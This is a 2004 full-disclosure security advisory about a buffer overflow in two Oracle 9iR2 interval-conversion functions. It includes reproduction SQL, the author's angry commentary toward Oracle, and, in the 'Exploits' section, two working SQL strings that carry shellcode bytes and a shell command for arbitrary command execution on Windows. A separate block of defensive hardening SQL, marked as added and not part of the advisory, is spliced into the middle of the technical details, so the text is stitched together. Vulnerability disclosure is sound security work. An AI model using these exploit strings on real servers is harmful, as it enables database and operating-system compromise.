Security Advisory

Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow
System Affected: Oracle Database 9ir2, previous versions could be affected too.
Severity: High
Remote exploitable: Yes
Author: Cesar Cerrudo
Date: 02/05/04
Advisory Number: CC020401
Legal Notice:

This Advisory is Copyright (c) 2003 Cesar Cerrudo. You may distribute it unmodified and for free. You may NOT modify it and distribute it, or distribute parts of it, without the author's written permission. You may NOT use it for commercial intentions (this means including it in vulnerability databases, vulnerability scanners, any paid service, etc.) without the author's written permission. You are free to use Oracle details for commercial intentions.

Disclaimer:

The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory are my own and not of any company. The usual standard disclaimer applies, especially the fact that Cesar Cerrudo is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory. Cesar Cerrudo bears no responsibility for content or misuse of this advisory or any derivatives thereof.

!!!!!!!!!!!ALERT!!!!!!!!!!!:

Oracle was contacted about these vulnerabilities, but their Security Response Team is one of the worst that I have dealt with; they don't care about security and they don't even follow OISafety rules (Oracle is a member). For this reason we have only told Oracle about a couple of bugs. I think I won't contact them anymore, or maybe if I get a letter from Larry Ellison asking for apologies... :). Anyway, if Oracle would spend more money on security than on marketing saying that their products are unbreakable, everything would be different. Right now Oracle database server and other Oracle products are some kind of backdoor. These vulnerabilities are just a bit of the 60+ that we have identified (yes, more than 60 issues, and most of these issues can be exploited by any low privileged user to take complete control over the database and probably the OS; also, for some of them there aren't any workarounds).
If you are running Oracle I recommend you start praying not to be hacked and start complaining to Oracle to improve the quality of their products and to release patches. BTW: if someone from Oracle dares to say that I'm not telling the truth, then probably I will release all the hole information to shut their mouths.

Some workarounds to protect your Oracle servers until maybe next year, when Oracle probably could fix their buggy database server:

- Check package permissions and remove public permission; set the minimal permissions that fit your needs.
- Check Directory Object permissions and remove public permission; set the minimal permissions that fit your needs; remove Directory Objects if not used.
- Restrict users from executing PL/SQL statements directly on the server.
- Periodically audit user permissions on all database objects.
- Lock users that aren't used.
- Change default passwords.

If you want automation, I really like AppDetective for Oracle: http://www.appsecinc.com/products/appdetective/oracle/

Overview:

Oracle Database Server is one of the most used database servers in the world. It was marketed as being unbreakable, and many people think that it is one of the most secure database servers on the market. Larry Ellison (Oracle CEO) says that Oracle is used by the NSA, CIA, Russian intelligence, governments, etc. (www.commonwealthclub.org/archive/96/96-03ellison-qa.html), so it must be really secure!!!

Oracle Database Server provides two functions that can be used with PL/SQL to convert numbers to date/time intervals; these functions have buffer overflow vulnerabilities.

Details:

When either of these conversion functions is called with a long string as the second parameter (normally the interval unit name, such as 'YEAR' or 'MONTH' for NUMTOYMINTERVAL and 'DAY', 'HOUR', 'MINUTE' or 'SECOND' for NUMTODSINTERVAL), a buffer overflow occurs. To reproduce the overflow, execute the following PL/SQL:

SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;

This vulnerability can be exploited by any Oracle Database user because access to these functions can't be restricted.
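The workaround list above, turned into the checks and statements a DBA would actually run. This is an added example and is not part of Cesar Cerrudo's advisory; it assumes the Oracle 9iR2 data dictionary views DBA_TAB_PRIVS, DBA_OBJECTS, DBA_DIRECTORIES, DBA_ROLE_PRIVS, DBA_SYS_PRIVS and DBA_USERS, queried from a DBA account, and every owner, package, directory and account name in the REVOKE, DROP and ALTER USER statements is a placeholder to be replaced with names taken from the preceding query output. The permission audit goes slightly beyond the list in that it also walks nested role grants, since a privilege reachable through a chain of roles is still a privilege the user holds.

```sql
-- Added example, not from the advisory: Oracle 9iR2 hardening checks that
-- implement the workaround list. Run from a DBA account (e.g. SYSTEM).
-- All names in the REVOKE / DROP / ALTER USER statements are placeholders.

-- 1. Package permissions: PL/SQL units that every account can execute
--    through PUBLIC. Review each row and revoke what your applications
--    do not need, then grant EXECUTE back to the specific roles that do.
SELECT p.owner, p.table_name AS object_name, o.object_type, p.privilege
  FROM dba_tab_privs p
  JOIN dba_objects o
    ON o.owner = p.owner
   AND o.object_name = p.table_name
 WHERE p.grantee = 'PUBLIC'
   AND o.object_type IN ('PACKAGE', 'PROCEDURE', 'FUNCTION')
 ORDER BY p.owner, p.table_name;

REVOKE EXECUTE ON some_owner.some_package FROM PUBLIC;   -- placeholder

-- 2. Directory objects: every directory, its OS path and who holds
--    READ/WRITE on it. The LEFT JOIN keeps directories that have no
--    grants at all, which are the ones to consider dropping.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
    ON p.owner = d.owner
   AND p.table_name = d.directory_name
 ORDER BY d.directory_name, p.grantee;

REVOKE READ, WRITE ON DIRECTORY some_dir FROM PUBLIC;    -- placeholder
DROP DIRECTORY unused_dir;                               -- placeholder

-- 3. Permission audit for one account: object and system privileges held
--    directly or through any role in its role hierarchy. CONNECT BY walks
--    nested role grants (role granted to role). 'SOME_USER' is a placeholder.
SELECT 'OBJECT' AS kind,
       p.grantee,
       p.owner || '.' || p.table_name AS target,
       p.privilege
  FROM dba_tab_privs p
 WHERE p.grantee = 'SOME_USER'
    OR p.grantee IN (SELECT granted_role
                       FROM dba_role_privs
                      START WITH grantee = 'SOME_USER'
                    CONNECT BY PRIOR granted_role = grantee)
UNION ALL
SELECT 'SYSTEM',
       s.grantee,
       CAST(NULL AS VARCHAR2(61)),
       s.privilege
  FROM dba_sys_privs s
 WHERE s.grantee = 'SOME_USER'
    OR s.grantee IN (SELECT granted_role
                       FROM dba_role_privs
                      START WITH grantee = 'SOME_USER'
                    CONNECT BY PRIOR granted_role = grantee)
 ORDER BY 1, 2, 3;

-- 4. Unused and default accounts: list what is still OPEN, then lock
--    whatever nobody uses and change any remaining default password.
SELECT username, account_status, created, lock_date
  FROM dba_users
 WHERE account_status = 'OPEN'
 ORDER BY username;

ALTER USER some_unused_user ACCOUNT LOCK;                        -- placeholder
ALTER USER some_app_user IDENTIFIED BY "replace_with_strong_pw";  -- placeholder
```

Run the SELECTs first and keep their output; the REVOKE, DROP and ALTER USER statements are only meaningful once substituted with real names from that output, and the package query in step 1 is the one to repeat after every upgrade or new product install, since those are what put fresh PUBLIC grants on a server.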
Exploitation of this vulnerability allows an attacker to execute arbitrary code; it can also be exploited to cause a DoS (denial of service) by killing the Oracle server process. An attacker can completely compromise the OS and database if Oracle is running on the Windows platform, because Oracle must run under the Local System account or under an administrative account. If Oracle is running on *nix then only the database could be compromised, because Oracle mostly runs under the oracle user, which has restricted permissions.

Important!: Exploitation of these vulnerabilities becomes easy if Oracle Internet Directory has been deployed, because Oracle Internet Directory creates a database user called ODSCOMMON that has a default password ODSCOMMON (Unbreakable???, hahaha, please take a look at this http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html); this password can not be changed, so any attacker can use this user to connect to the database and exploit these vulnerabilities.

Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and Linux confirm these vulnerabilities; versions running on other OS platforms are believed to be affected too. Previous Oracle Database Server versions could be affected by these vulnerabilities.

Exploits:

--these exploits should work on W2K Server and WinXP, not tested on Win2003.
--run any command at the end of the string

SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL;

SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL;

Vendor Fix:

Go to the Oracle Metalink site, http://metalink.oracle.com

Vendor Contact:

Oracle was contacted and they released a fix without telling me or the public anything and without issuing an alert.

_______________________________________________
Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html